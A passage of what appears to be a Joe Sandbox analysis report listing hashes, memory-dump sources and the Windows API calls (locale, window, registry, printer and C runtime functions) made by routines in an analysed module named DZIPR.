                                          • Opcode Fuzzy Hash: 9c21d8fd1813e8ff8d5169c09b7967652a352a7ca489d5cedbecf32042046658
                                          • Instruction Fuzzy Hash: E6F04F31604249EBDF019FB5CD0AAAE3FAEBF12754F44C021F829D5050DB39DA92DB50
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 80750ab207421b535c7073e0f5fc6907ba3a83069adf37e5bfbae80bc9e21130
                                          • Instruction ID: daf1fa15852b9fbe59f49433e8c9d77f04ab4eac504f94900d90a0d3ccb7cab9
                                          • Opcode Fuzzy Hash: 80750ab207421b535c7073e0f5fc6907ba3a83069adf37e5bfbae80bc9e21130
                                          • Instruction Fuzzy Hash: 6E318676A087058FC724CF59C58062AB7E2FFC9714F5A882DD88857301DB74F895CB81
                                          APIs
                                          • __EH_prolog3_GS.LIBCMT ref: 6FA48BE9
                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000260,6FA48EB7,?,?), ref: 6FA48C19
                                          • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6FA48C2D
                                          • ConvertDefaultLocale.KERNEL32(?), ref: 6FA48C69
                                          • ConvertDefaultLocale.KERNEL32(?), ref: 6FA48C77
                                          • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6FA48C94
                                          • ConvertDefaultLocale.KERNEL32(?), ref: 6FA48CBF
                                          • ConvertDefaultLocale.KERNEL32(000003FF), ref: 6FA48CC8
                                          • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 6FA48CE1
                                          • EnumResourceLanguagesW.KERNEL32(00000000,00000010,00000001,Function_000084C0,?), ref: 6FA48CFE
                                          • ConvertDefaultLocale.KERNEL32(?), ref: 6FA48D31
                                          • ConvertDefaultLocale.KERNEL32(00000000), ref: 6FA48D3A
                                          • GetModuleFileNameW.KERNEL32(6FA40000,?,00000105), ref: 6FA48D7F
                                          • _memset.LIBCMT ref: 6FA48D9F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
                                          • String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                          • API String ID: 3537336938-2299501126
                                          • Opcode ID: 305e185b5132203d3e398f677a10138e7cc6ee2acff4b2c72e0c9a2b4c52c301
                                          • Instruction ID: 6b4cbc4e7b44d839d31e5bc28f20f629b646901f410e975a9dfb169ef21a872c
                                          • Opcode Fuzzy Hash: 305e185b5132203d3e398f677a10138e7cc6ee2acff4b2c72e0c9a2b4c52c301
                                          • Instruction Fuzzy Hash: 6B513D71D052289ECB60EFA5AD887ADB7B8FF59714F1001D6A448E3280D7789EC1CF94
                                          APIs
                                          • GetModuleHandleW.KERNEL32(USER32,00000000,00000000,76944A40,6FA4DE36,?,?,?,?,?,?,?,6FA4FCC6,00000000,00000002,00000028), ref: 6FA4DCF9
                                          • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 6FA4DD15
                                          • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6FA4DD2A
                                          • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 6FA4DD3B
                                          • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 6FA4DD4C
                                          • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 6FA4DD5D
                                          • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesW), ref: 6FA4DD6E
                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 6FA4DD8E
                                          Strings
                                          Similarity
                                          • API ID: AddressProc$HandleModule
                                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetMonitorInfoA$GetMonitorInfoW$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                          • API String ID: 667068680-2451437823
                                          • Opcode ID: c15971294d938876fd93cb80273eceaaa407734f579b4f8ab1d889e99b54b78f
                                          • Instruction ID: fe7f06679e2214e4a078d9fe816d5898b08c8764b703195cb0a736ecf84e5d94
                                          • Opcode Fuzzy Hash: c15971294d938876fd93cb80273eceaaa407734f579b4f8ab1d889e99b54b78f
                                          • Instruction Fuzzy Hash: 2B213D75915BF1DF8B00AF748AC8C6A7AE9B78FA21314C53FD811D6208C7B850D2CB20
                                          APIs
                                          • __EH_prolog3_GS.LIBCMT ref: 6FA519B8
                                            • Part of subcall function 6FA4C050: __EH_prolog3.LIBCMT ref: 6FA4C057
                                          • CallNextHookEx.USER32(?,?,?,?), ref: 6FA519F8
                                            • Part of subcall function 6FA46DC1: __CxxThrowException@8.LIBCMT ref: 6FA46DD7
                                            • Part of subcall function 6FA46DC1: __EH_prolog3.LIBCMT ref: 6FA46DE4
                                          • _memset.LIBCMT ref: 6FA51A51
                                          • GetClassLongW.USER32(?,000000E0), ref: 6FA51A85
                                          • SetWindowLongW.USER32(?,000000FC,Function_00010D95), ref: 6FA51ADA
                                          • GetClassNameW.USER32(?,?,00000100), ref: 6FA51B20
                                          • GetWindowLongW.USER32(?,000000FC), ref: 6FA51B46
                                          • GetPropW.USER32(?,AfxOldWndProc423), ref: 6FA51B5D
                                          • SetPropW.USER32(?,AfxOldWndProc423,?), ref: 6FA51B6F
                                          • GetPropW.USER32(?,AfxOldWndProc423), ref: 6FA51B77
                                          • GlobalAddAtomW.KERNEL32(AfxOldWndProc423), ref: 6FA51B86
                                          • SetWindowLongW.USER32(?,000000FC,Function_00011861), ref: 6FA51B94
                                          • CallNextHookEx.USER32(?,00000003,?,?), ref: 6FA51BA6
                                          • UnhookWindowsHookEx.USER32(?), ref: 6FA51BBA
                                          Strings
                                          Similarity
                                          • API ID: Long$HookPropWindow$CallClassH_prolog3Next$AtomException@8GlobalH_prolog3_NameThrowUnhookWindows_memset
                                          • String ID: #32768$AfxOldWndProc423
                                          • API String ID: 4265692241-2141921550
                                          • Opcode ID: 50ef3992f4713540d54f0e46c53b775b27c55a786be75b6f050337ca5ddc981f
                                          • Instruction ID: a118d575ade916c6ca02d6fac6ae2973f284491feb7b35bda0a97b01470f9b5b
                                          • Opcode Fuzzy Hash: 50ef3992f4713540d54f0e46c53b775b27c55a786be75b6f050337ca5ddc981f
                                          • Instruction Fuzzy Hash: 6D51F5B1540729ABCF11AF64CD48FBA7BB8BF05365F054195F419A61C0EB389AE1CBA0
                                          APIs
                                            • Part of subcall function 6FA52C57: GetWindowLongW.USER32(?,000000F0), ref: 6FA52C62
                                          • GetParent.USER32(?), ref: 6FA4FC05
                                          • SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 6FA4FC28
                                          • GetWindowRect.USER32(?,?), ref: 6FA4FC42
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 6FA4FC58
                                          • CopyRect.USER32(?,?), ref: 6FA4FCA5
                                          • CopyRect.USER32(?,?), ref: 6FA4FCAF
                                          • GetWindowRect.USER32(00000000,?), ref: 6FA4FCB8
                                            • Part of subcall function 6FA4DE96: MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 6FA4DED6
                                          • CopyRect.USER32(?,?), ref: 6FA4FCD4
                                          Strings
                                          Similarity
                                          • API ID: Rect$Window$Copy$Long$ByteCharMessageMultiParentSendWide
                                          • String ID: (
                                          • API String ID: 1385303425-3887548279
                                          • Opcode ID: fc1c716581296de5880642c843d538e6cf317b5f6af12ca6b5c2dde2fb63369e
                                          • Instruction ID: 43b26290cd29bb1c1cf494b18215941000235729716d6d14036393fd4a2616eb
                                          • Opcode Fuzzy Hash: fc1c716581296de5880642c843d538e6cf317b5f6af12ca6b5c2dde2fb63369e
                                          • Instruction Fuzzy Hash: FC516172904619AFDB00CFB8DD85AEEBBB9BF49314F095119E915F7180D734E941CB90
                                          APIs
                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,6FA6E928,0000000C,6FA5A25A,00000000,00000000), ref: 6FA5A131
                                          • __crt_waiting_on_module_handle.LIBCMT ref: 6FA5A13C
                                            • Part of subcall function 6FA55BCF: Sleep.KERNEL32(000003E8,00000000,?,6FA5A082,KERNEL32.DLL,?,6FA5A0CE), ref: 6FA55BDB
                                            • Part of subcall function 6FA55BCF: GetModuleHandleW.KERNEL32(6FA6C168,?,6FA5A082,KERNEL32.DLL,?,6FA5A0CE), ref: 6FA55BE4
                                          • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 6FA5A165
                                          • GetProcAddress.KERNEL32(?,DecodePointer), ref: 6FA5A175
                                          • __lock.LIBCMT ref: 6FA5A197
                                          • InterlockedIncrement.KERNEL32(6FA48ADA), ref: 6FA5A1A4
                                          • __lock.LIBCMT ref: 6FA5A1B8
                                          • ___addlocaleref.LIBCMT ref: 6FA5A1D6
                                          Strings
                                          Similarity
                                          • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                          • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                          • API String ID: 1028249917-2843748187
                                          • Opcode ID: 60a1f5a776698b30c072e995dee929e084118288eb25f056d5939f7fafc5e784
                                          • Instruction ID: 24008840158fe247a4706aee2cce8cec2b896bf5818f8f78ec5227399d36d9f5
                                          • Opcode Fuzzy Hash: 60a1f5a776698b30c072e995dee929e084118288eb25f056d5939f7fafc5e784
                                          • Instruction Fuzzy Hash: 9711B1B1904B01DFDB209F39C904B5ABBE5BF45328F10851DD49A97290CB3CAAD1CF68
                                          APIs
                                          • GetModuleHandleW.KERNEL32(KERNEL32), ref: 6FA48503
                                          • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6FA48520
                                          • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 6FA4852D
                                          • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 6FA4853A
                                          • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 6FA48547
                                          Strings
                                          Similarity
                                          • API ID: AddressProc$HandleModule
                                          • String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                          • API String ID: 667068680-2424895508
                                          • Opcode ID: 70c15bb7cfb32baf4c02053861613813d56e2da5c2a43a11fbfee1a0b947cede
                                          • Instruction ID: 19eb841d7e62ae34a1eb1d670e7e8289a1e2a08c1ffbcca80ff3e6f11ebf7c59
                                          • Opcode Fuzzy Hash: 70c15bb7cfb32baf4c02053861613813d56e2da5c2a43a11fbfee1a0b947cede
                                          • Instruction Fuzzy Hash: CC1182B580D762AF8B109F65988AC06BFECAF57325309803FE55A97210DB3894D1CFD2
                                          APIs
                                          • GetModuleHandleW.KERNEL32(KERNEL32,6FA4A6B6), ref: 6FA4A5AA
                                          • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6FA4A5CB
                                          • GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6FA4A5DD
                                          • GetProcAddress.KERNEL32(ActivateActCtx), ref: 6FA4A5EF
                                          • GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6FA4A601
                                            • Part of subcall function 6FA46DC1: __CxxThrowException@8.LIBCMT ref: 6FA46DD7
                                            • Part of subcall function 6FA46DC1: __EH_prolog3.LIBCMT ref: 6FA46DE4
                                          Strings
                                          Similarity
                                          • API ID: AddressProc$Exception@8H_prolog3HandleModuleThrow
                                          • String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                          • API String ID: 417325364-2424895508
                                          • Opcode ID: 0208dddc760bd4054d5a8152fa48f1c1d3a2c12a274da1630a352197d2f8aed8
                                          • Instruction ID: 30de53e63e18871f9a8ca244c2f86dfd447dbce02c1788691820ce5e6402ef36
                                          • Opcode Fuzzy Hash: 0208dddc760bd4054d5a8152fa48f1c1d3a2c12a274da1630a352197d2f8aed8
                                          • Instruction Fuzzy Hash: 2FF0DA7D809B35AFCF515FA18805D167FEDAF17235702C41AA88093210E77880A6CFC1
                                          APIs
                                          • __EH_prolog3_catch.LIBCMT ref: 6FA51868
                                          • GetPropW.USER32(?,AfxOldWndProc423), ref: 6FA51877
                                          • CallWindowProcW.USER32(?,?,00000110,?,00000000), ref: 6FA518D1
                                            • Part of subcall function 6FA50C2C: GetWindowRect.USER32(?,10000000), ref: 6FA50C56
                                          • SetWindowLongW.USER32(?,000000FC,?), ref: 6FA518F8
                                          • RemovePropW.USER32(?,AfxOldWndProc423), ref: 6FA51900
                                          • GlobalFindAtomW.KERNEL32(AfxOldWndProc423), ref: 6FA51907
                                          • GlobalDeleteAtom.KERNEL32(?), ref: 6FA51911
                                          • CallWindowProcW.USER32(?,?,?,?,00000000), ref: 6FA51965
                                          Strings
                                          Similarity
                                          • API ID: Window$AtomCallGlobalProcProp$DeleteFindH_prolog3_catchLongRectRemove
                                          • String ID: AfxOldWndProc423
                                          • API String ID: 2109165785-1060338832
                                          • Opcode ID: 4422d030fb0b099a90358b19b39c54efe798bbc596f3059260dd0c2a9171a356
                                          • Instruction ID: 95099d1e9e235df8cad0197b7dd0699db11e58ac7869bce3a8377ab68d111796
                                          • Opcode Fuzzy Hash: 4422d030fb0b099a90358b19b39c54efe798bbc596f3059260dd0c2a9171a356
                                          • Instruction Fuzzy Hash: 0A31367240421AABDF019FB4CE48EFF7BB8BF0A219F044119F611A6191C73999B1DBA1
                                          APIs
                                          • SetFilePointer.KERNEL32(?,?,?,00000000,?,?,?,?,?,6FA41BE9,?,?,?,?), ref: 6FA41C39
                                          • GetLastError.KERNEL32(?,?,?,?,?,6FA41BE9,?,?,?,?), ref: 6FA41C48
                                          • __aullrem.LIBCMT ref: 6FA41C60
                                          • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,00000000), ref: 6FA41CE8
                                          • _memset.LIBCMT ref: 6FA41CF5
                                          • SetFilePointer.KERNEL32(?,?,00000000,00000001,?,?,?,?,6FA41BE9,?,?,?,?), ref: 6FA41D07
                                          Similarity
                                          • API ID: File$Pointer$ErrorLastRead__aullrem_memset
                                          • String ID:
                                          • API String ID: 123228641-0
                                          • Opcode ID: bf1838314b0eaffeac2a482a0e24647b263f48fbee6fa4382de4d1ddeb730ecc
                                          • Instruction ID: f2ef585193cb25153452f223cf7425c922d4d1884d380a756ea2358288652816
                                          • Opcode Fuzzy Hash: bf1838314b0eaffeac2a482a0e24647b263f48fbee6fa4382de4d1ddeb730ecc
                                          • Instruction Fuzzy Hash: A3518FB1604701AFD741DF39CC40BABB7E8EF88764F044A2AF958D7240E774E9558BA2
                                          APIs
                                          • __EH_prolog3_catch.LIBCMT ref: 6FA4BE14
                                          • EnterCriticalSection.KERNEL32(?,00000010,6FA4C0D0,?,00000000,?,00000004,6FA4AF00,6FA46DDD,6FA4A591,6FA42BC2,?,?,?,?,?), ref: 6FA4BE25
                                          • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,6FA4AF00,6FA46DDD,6FA4A591,6FA42BC2,?,?,?,?,?), ref: 6FA4BE43
                                          • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,6FA4AF00,6FA46DDD,6FA4A591,6FA42BC2,?,?,?), ref: 6FA4BE77
                                          • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,6FA4AF00,6FA46DDD,6FA4A591,6FA42BC2,?,?,?,?,?), ref: 6FA4BEE3
                                          • _memset.LIBCMT ref: 6FA4BF02
                                          • TlsSetValue.KERNEL32(?,00000000,?), ref: 6FA4BF13
                                          • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,6FA4AF00,6FA46DDD,6FA4A591,6FA42BC2,?,?,?,?,?), ref: 6FA4BF34
                                          Similarity
                                          • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                          • String ID:
                                          • API String ID: 1891723912-0
                                          • Opcode ID: d17410857eb28d991b64546e1888b93fd53eaf7ac417c340342ec60512b7c214
                                          • Instruction ID: 1390999cde8677614e35a8e7fd517eafbd0d8244288f4ecdf30000c0d51c58ca
                                          • Opcode Fuzzy Hash: d17410857eb28d991b64546e1888b93fd53eaf7ac417c340342ec60512b7c214
                                          • Instruction Fuzzy Hash: ED31AF70404705EFDB14DF24C985C6EBBB5FF41364B10C62AE62A9B690CB38E990CF90
                                          APIs
                                            • Part of subcall function 6FA4815A: GetParent.USER32(?), ref: 6FA481AE
                                            • Part of subcall function 6FA4815A: GetLastActivePopup.USER32(?), ref: 6FA481BF
                                            • Part of subcall function 6FA4815A: IsWindowEnabled.USER32(?), ref: 6FA481D3
                                            • Part of subcall function 6FA4815A: EnableWindow.USER32(?,00000000), ref: 6FA481E6
                                          • EnableWindow.USER32(?,00000001), ref: 6FA48247
                                          • GetWindowThreadProcessId.USER32(?,?), ref: 6FA4825B
                                          • GetCurrentProcessId.KERNEL32(?,?), ref: 6FA48265
                                          • SendMessageW.USER32(?,00000376,00000000,00000000), ref: 6FA4827D
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 6FA482F9
                                          • EnableWindow.USER32(00000000,00000001), ref: 6FA48340
                                          Strings
                                          Similarity
                                          • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                          • String ID: 0
                                          • API String ID: 1877664794-4108050209
                                          • Opcode ID: f382f762d6777eeaabc35779b44ea46fac48151fba7fda189ccf27a3d0e3005c
                                          • Instruction ID: 9427db0dcca9a8805f9cda4dc1cdb4f350c17bd33f3122282a506866913bfac9
                                          • Opcode Fuzzy Hash: f382f762d6777eeaabc35779b44ea46fac48151fba7fda189ccf27a3d0e3005c
                                          • Instruction Fuzzy Hash: 0A41A171A48B189BDB208F64DC88BDA77B8FF05710F180599E924E6180D774EAD08FD0
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 6FA4DED6
                                          • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 6FA4DF00
                                          • GetSystemMetrics.USER32(00000000), ref: 6FA4DF17
                                          • GetSystemMetrics.USER32(00000001), ref: 6FA4DF1E
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,DISPLAY,000000FF,-00000028,00000020), ref: 6FA4DF49
                                          Strings
                                          Similarity
                                          • API ID: System$ByteCharMetricsMultiWide$InfoParameters
                                          • String ID: B$DISPLAY
                                          • API String ID: 381819527-3316187204
                                          APIs
                                          • GlobalLock.KERNEL32(?), ref: 6FA488E7
                                          • lstrcmpW.KERNEL32(00000000,?), ref: 6FA488F4
                                          • OpenPrinterW.WINSPOOL.DRV(?,?,00000000), ref: 6FA48906
                                          • DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6FA48926
                                          • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6FA4892E
                                          • GlobalLock.KERNEL32(00000000), ref: 6FA48938
                                          • DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 6FA48945
                                          • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 6FA4895D
                                            • Part of subcall function 6FA4DAD1: GlobalFlags.KERNEL32(?), ref: 6FA4DAE0
                                            • Part of subcall function 6FA4DAD1: GlobalUnlock.KERNEL32(?), ref: 6FA4DAF2
                                            • Part of subcall function 6FA4DAD1: GlobalFree.KERNEL32(?), ref: 6FA4DAFD
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          Similarity
                                          • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                          • String ID:
                                          • API String ID: 168474834-0
                                          APIs
                                          • GetSystemMetrics.USER32(0000000B), ref: 6FA4CD75
                                          • GetSystemMetrics.USER32(0000000C), ref: 6FA4CD7C
                                          • GetSystemMetrics.USER32(00000002), ref: 6FA4CD83
                                          • GetSystemMetrics.USER32(00000003), ref: 6FA4CD8D
                                          • GetDC.USER32(00000000), ref: 6FA4CD97
                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 6FA4CDA8
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 6FA4CDB0
                                          • ReleaseDC.USER32(00000000,00000000), ref: 6FA4CDB8
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          Similarity
                                          • API ID: MetricsSystem$CapsDevice$Release
                                          • String ID:
                                          • API String ID: 1151147025-0
                                          APIs
                                          • _memset.LIBCMT ref: 6FA5029B
                                          • SendMessageW.USER32(00000000,00000433,00000000,?), ref: 6FA502C4
                                          • GetWindowLongW.USER32(?,000000FC), ref: 6FA502D6
                                          • GetWindowLongW.USER32(?,000000FC), ref: 6FA502E7
                                          • SetWindowLongW.USER32(?,000000FC,?), ref: 6FA50303
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          Similarity
                                          • API ID: LongWindow$MessageSend_memset
                                          • String ID: ,
                                          • API String ID: 2997958587-3772416878
                                          APIs
                                          • __EH_prolog3_GS.LIBCMT ref: 6FA4A20A
                                          • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 6FA4A2F0
                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 6FA4A30D
                                          • RegCloseKey.ADVAPI32(?), ref: 6FA4A32D
                                          • RegQueryValueW.ADVAPI32(80000001,?,?,?), ref: 6FA4A348
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          Similarity
                                          • API ID: CloseEnumH_prolog3_OpenQueryValue
                                          • String ID: Software\
                                          • API String ID: 1666054129-964853688
                                          APIs
                                          • __EH_prolog3_catch_GS.LIBCMT ref: 6FA4A08C
                                          • RegOpenKeyW.ADVAPI32(?,?,?), ref: 6FA4A11A
                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 6FA4A13D
                                            • Part of subcall function 6FA4A02D: __EH_prolog3.LIBCMT ref: 6FA4A034
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          Similarity
                                          • API ID: EnumH_prolog3H_prolog3_catch_Open
                                          • String ID: Software\Classes\
                                          • API String ID: 3518408925-1121929649
                                          APIs
                                          • RegOpenKeyExW.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 6FA4D0AE
                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6FA4D0D1
                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6FA4D0ED
                                          • RegCloseKey.ADVAPI32(?), ref: 6FA4D0FD
                                          • RegCloseKey.ADVAPI32(?), ref: 6FA4D107
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          Similarity
                                          • API ID: CloseCreate$Open
                                          • String ID: software
                                          • API String ID: 1740278721-2010147023
                                          APIs
                                          • LeaveCriticalSection.KERNEL32(?), ref: 6FA4BEB5
                                          • __CxxThrowException@8.LIBCMT ref: 6FA4BEBF
                                            • Part of subcall function 6FA5527B: RaiseException.KERNEL32(?,00000003,000000FF,6FA4279F), ref: 6FA552BD
                                          • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,6FA4AF00,6FA46DDD,6FA4A591,6FA42BC2,?), ref: 6FA4BED6
                                          • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,6FA4AF00,6FA46DDD,6FA4A591,6FA42BC2,?,?,?,?,?), ref: 6FA4BEE3
                                            • Part of subcall function 6FA46D89: __CxxThrowException@8.LIBCMT ref: 6FA46D9F
                                          • _memset.LIBCMT ref: 6FA4BF02
                                          • TlsSetValue.KERNEL32(?,00000000,?), ref: 6FA4BF13
                                          • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,6FA4AF00,6FA46DDD,6FA4A591,6FA42BC2,?,?,?,?,?), ref: 6FA4BF34
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          Similarity
                                          • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                          • String ID:
                                          • API String ID: 356813703-0
                                          APIs
                                          • SetErrorMode.KERNEL32(00000000), ref: 6FA4CA85
                                          • SetErrorMode.KERNEL32(00000000), ref: 6FA4CA8D
                                            • Part of subcall function 6FA4A698: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6FA4A6D0
                                            • Part of subcall function 6FA4A698: SetLastError.KERNEL32(0000006F), ref: 6FA4A6E7
                                          • GetModuleHandleW.KERNEL32(user32.dll), ref: 6FA4CADC
                                          • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 6FA4CAEC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          Similarity
                                          • API ID: Error$ModeModule$AddressFileHandleLastNameProc
                                          • String ID: NotifyWinEvent$user32.dll
                                          • API String ID: 1146408833-597752486
                                          APIs
                                          • GetSysColor.USER32(0000000F), ref: 6FA4CD2E
                                          • GetSysColor.USER32(00000010), ref: 6FA4CD35
                                          • GetSysColor.USER32(00000014), ref: 6FA4CD3C
                                          • GetSysColor.USER32(00000012), ref: 6FA4CD43
                                          • GetSysColor.USER32(00000006), ref: 6FA4CD4A
                                          • GetSysColorBrush.USER32(0000000F), ref: 6FA4CD57
                                          • GetSysColorBrush.USER32(00000006), ref: 6FA4CD5E
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          Similarity
                                          • API ID: Color$Brush
                                          • String ID:
                                          • API String ID: 2798902688-0
                                          APIs
                                          • GetWindowLongW.USER32(?,000000F0), ref: 6FA4818D
                                          • GetParent.USER32(?), ref: 6FA4819B
                                          • GetParent.USER32(?), ref: 6FA481AE
                                          • GetLastActivePopup.USER32(?), ref: 6FA481BF
                                          • IsWindowEnabled.USER32(?), ref: 6FA481D3
                                          • EnableWindow.USER32(?,00000000), ref: 6FA481E6
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          Similarity
                                          • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                          • String ID:
                                          • API String ID: 670545878-0
                                          APIs
                                          • __CreateFrameInfo.LIBCMT ref: 6FA5C43E
                                            • Part of subcall function 6FA54FC4: __getptd.LIBCMT ref: 6FA54FD2
                                            • Part of subcall function 6FA54FC4: __getptd.LIBCMT ref: 6FA54FE0
                                          • __getptd.LIBCMT ref: 6FA5C448
                                            • Part of subcall function 6FA5A27F: __getptd_noexit.LIBCMT ref: 6FA5A282
                                            • Part of subcall function 6FA5A27F: __amsg_exit.LIBCMT ref: 6FA5A28F
                                          • __getptd.LIBCMT ref: 6FA5C456
                                          • __getptd.LIBCMT ref: 6FA5C464
                                          • __getptd.LIBCMT ref: 6FA5C46F
                                          • _CallCatchBlock2.LIBCMT ref: 6FA5C495
                                            • Part of subcall function 6FA55069: __CallSettingFrame@12.LIBCMT ref: 6FA550B5
                                            • Part of subcall function 6FA5C53C: __getptd.LIBCMT ref: 6FA5C54B
                                            • Part of subcall function 6FA5C53C: __getptd.LIBCMT ref: 6FA5C559
                                          Memory Dump Source
